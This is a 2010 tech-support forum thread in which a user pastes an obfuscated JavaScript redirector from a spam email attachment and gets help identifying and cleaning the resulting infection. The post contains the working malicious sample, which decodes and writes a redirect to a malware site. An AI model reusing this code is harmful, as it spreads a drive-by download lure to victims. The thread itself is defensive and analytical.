Solved

Does Anyone Know This Malicious Attachment

Posted on 2010-09-20
Last Modified: 2013-11-22
Hi,

I just received one of those spam emails that had an attachment inside it, from what looked like a person I recognised. The attachment had a not too unfamiliar name, report.html, and I opened it with Firefox.

The attachment was a few lines of JavaScript, which I have included below for reference and which appears to be part of the jsunpack tool.

After clicking on the attachment, a line of text appeared in the browser along the lines of "please wait a few seconds". At this point I right-clicked the attachment and ran an AVG scan on it, which reported malware.

Additionally, a window popped up which appeared to be Windows Firewall asking me if I wanted to block Windows Explorer. I clicked "Block" and then shut down the computer.

I re-booted and all seems to be OK, but the Windows Firewall message is displayed asking if I want to Keep Blocking Windows Explorer.

Does anyone understand the code below and know if this is a virus/trojan, so that I can find out what it does and try to remove it? I have run a full AVG scan but it doesn't report a virus is present.

Many thanks

<script language="JavaScript" type="text/javascript">
function bn6s(m0ga){
  var lpr5,co7a="",idmu,s1d5="goac>tep \":/;iv=b-nq.rhfuxm0sl<",os9w,yvsg=s1d5.length;
  eval(unescape("%66un%63ti%6Fn b%7677%28jn%63v){%63o7%61+=%6Ancv%7D"));
  for(os9w=0;os9w<m0ga.length;os9w++){
    idmu=m0ga.charAt(os9w);
    lpr5=s1d5.indexOf(idmu);
    if(lpr5>-1){
      lpr5-=(os9w+1)%yvsg;
      if(lpr5<0){lpr5+=yvsg;}
      bv77(s1d5.charAt(lpr5));
    }else{
      bv77(idmu);
    }
  }
  eval(unescape("%64oc%75me%6Et.w%72it%65(c%6F7a)%3Bco%37a=%22%22;"));
}
bn6s("gs\"\"pvliv-snops<o0\"mi;lrb>>g<-tp. qvaqo< mcnqhmslere.ll=oa-<.g;0fm:ot--r=");
</script>
<noscript>To display this page you need a browser that supports JavaScript.</noscript>
Question by:ls21gce
20 Comments
 
LVL 7

Expert Comment

by:JohnThePro
ID: 33718140
Hard to say for sure exactly what it does.

It appears to use some encryption.
 
LVL 7

Expert Comment

by:JohnThePro
ID: 33718145
On a side-note,

Go to Google and download MalwareBytes Anti-Malware, their free version. Install it, and run a scan with it. I bet it finds something.
 
LVL 8

Expert Comment

by:hello_everybody
ID: 33718767
It will direct you to: http://nobletree.org/x.html (that specific page doesn't exist, but the website does).

I hope that helps!
 
LVL 7

Expert Comment

by:JohnThePro
ID: 33718959
 
LVL 26

Expert Comment

by:Thomas Zucker-Scharff
ID: 33718968
 

Author Comment

by:ls21gce
ID: 33719438
What is this nobletree.org website about? I clicked on this but it is some kind of investments website?
Is there really a guy on here masquerading as a "Master" just to send people to his investments site?
 
LVL 26

Expert Comment

by:Thomas Zucker-Scharff
ID: 33719705
As I said, don't go there. Whatever the site is, it isn't worth endangering your computer/identity over. Whenever you have a questionable website, if you don't use a link checker like linkextender, AVG link checker, or Web of Trust, use F-Secure's URL checker:

https://browsingprotectionbeta.f-secure.com/swp/home
 

Author Comment

by:ls21gce
ID: 33719944
Can I just recap on your view of this embedded javascript code...

By opening this code in a browser, it will not have been able to deposit any sort of "payload" onto my computer in the form of a virus etc.? Instead it is a harmless redirection to some kind of investments website in an attempt to gather business?

Thanks
 
LVL 26

Expert Comment

by:Thomas Zucker-Scharff
ID: 33719973
It is a redirection to that site, but according to the f-secure site it is anything BUT harmless - beware of a payload from that site.
 
LVL 29

Expert Comment

by:Sudeep Sharma
ID: 33720590
I have saved the above code into a file and uploaded it to Virustotal.com, and it reported that at least 9 antivirus vendors found this code suspicious. Here are the ones which detected the virus:

Vendor         Engine version    Signatures    Detection
Authentium     5.2.0.5           2010.09.20    HTML/Redir.C
ClamAV         0.96.2.0-git      2010.09.20    JS.Generic
F-Prot         4.6.2.117         2010.09.20    HTML/Redir.C
Kaspersky      7.0.0.125         2010.09.20    Trojan-Downloader.JS.Small.ov
Microsoft      1.6201            2010.09.20    VirTool:JS/Obfuscator.W
NOD32          5465              2010.09.20    JS/Redirector.NAU
PCTools        7.0.3.5           2010.09.20    Trojan.Webkit
Sophos         4.57.0            2010.09.20    JS/WndRed-B
VirusBuster    12.65.16.0        2010.09.20    JS.Redirector.Gen.13

There is no detailed information available on the net.

http://www.securelist.com/en/descriptions/15411634/Trojan-Downloader.JS.Small.ov

Since you mentioned that AVG detected it, I think you are safe and no harmful files were downloaded to your computer.

Sudeep
 

Author Comment

by:ls21gce
ID: 33720819
Hi Sudeep,

Thanks for your comments but I am not so confident that there was no harm done to my system.

What happened was that I received the message PLEASE WAITING 4 SECOND...
Then another window popped up which looked like it was from Windows Firewall, asking me if I wanted to block Windows Explorer. I immediately clicked on the "Block" button thinking I was doing the right thing, but I now suspect this was actually a fake screen designed to look like Windows Firewall, and that when I clicked I executed a payload. This was when my screen went blank and appeared to be scanning through files in DOS mode. I immediately executed a shutdown, but this was likely to be too late.

I have re-booted my system and the same pop-up message appeared asking if I wanted to keep blocking Windows Explorer, to which I clicked on "Keep Blocking", and all seems to be working OK, but how can I tell if my computer or our network is now infected?

I have executed an AVG virus scan which shows nothing.

 
LVL 29

Accepted Solution

by:
Sudeep Sharma earned 500 total points
ID: 33720840
Just to make sure the system is clean, do the following:

Try HitmanPro to make sure anything which might have been left behind is cleaned:
32bit
http://dl.surfright.nl/HitmanPro35.exe
http://download.cnet.com/Hitman-Pro-3/3000-2239_4-10895604.html

64bit
http://dl.surfright.nl/HitmanPro35_x64.exe

If the issue is not resolved by these tools, try TDSSKiller:
http://support.kaspersky.com/downloads/utils/tdsskiller.zip
http://support.kaspersky.com/downloads/utils/tdsskiller.exe

Tutorial on TDSSKiller:
http://support.kaspersky.com/viruses/solutions?qid=208280684

If this does not resolve your issue, then try ComboFix:

Download Combofix
http://download.bleepingcomputer.com/sUBs/ComboFix.exe
http://www.forospyware.com/sUBs/ComboFix.exe
http://subs.geekstogo.com/ComboFix.exe

Tutorial on how to use ComboFix:
http://www.bleepingcomputer.com/combofix/how-to-use-combofix

Post logs here for further analysis.

Sudeep
 

Author Comment

by:ls21gce
ID: 33721465
Hi Sudeep,

I have run all three of the tools you suggested. There were further .exe files identified and removed that were not seen by AVG. They were a.exe, created today in My Documents, and what looked like the same program (by size) in Application Data/Tivy/apola.exe. So it looks like this had deposited something onto my system, but what it is and whether all instances are removed is another question. I am just not sure if I can trust my system any more, as this appears to be a new threat. I can't find any reference to Tivy/apola on the net anywhere... Also it detected Variant.Kazy.711, which I can also not find.

I have also posted the logs as you suggested.

Many thanks
Combo-Fix-log.txt
Hitman-log.xml
TDSSKiller.2.4.2.1-20.09.2010-23.txt
 
LVL 29

Expert Comment

by:Sudeep Sharma
ID: 33728202
Could you please run Combofix one more time and paste the logs here?

Sudeep
 

Author Comment

by:ls21gce
ID: 33729314
Hi Sudeep,

I have now re-run the ComboFix tool and the log of Run2 is attached.

Thanks
Combo-Fix-log-Run2.txt
 
LVL 29

Expert Comment

by:Sudeep Sharma
ID: 33729848
The ComboFix logs above seem pretty clean to me. Are you still noticing any suspicious EXE anywhere in the system?

Even after reboot?

Sudeep
 

Author Comment

by:ls21gce
ID: 33730227
Hi Sudeep,

I am not noticing anything out of the ordinary, apart from the odd unexpected MS Outlook abend, but I have an unnerving feeling, almost paranoia, that if I log into my online banking account or enter my credit card details there might be an undetected trojan gathering the data to be sent to a rogue website somewhere.

I would certainly feel a lot happier if one of the big anti-virus companies tested this virus to find out what it is doing.

Do you think it will now be possible to trust this PC is clean and safe ?

Thanks
 
LVL 2

Expert Comment

by:waldosmx
ID: 33737486
Hi ls21gce, I recommend you start a topic here ;) geekstogo.com/forum/forum/37-virus-spyware-malware-removal/
 
LVL 29

Expert Comment

by:Sudeep Sharma
ID: 33737523
Since most things have been removed, I think you are good to go. However, we cannot say for sure that nothing else was left behind. But I must say you are now in a position where you could easily take a backup of your system and do a clean install.

Sudeep
 

Author Closing Comment

by:ls21gce
ID: 33742709
Top notch advice!
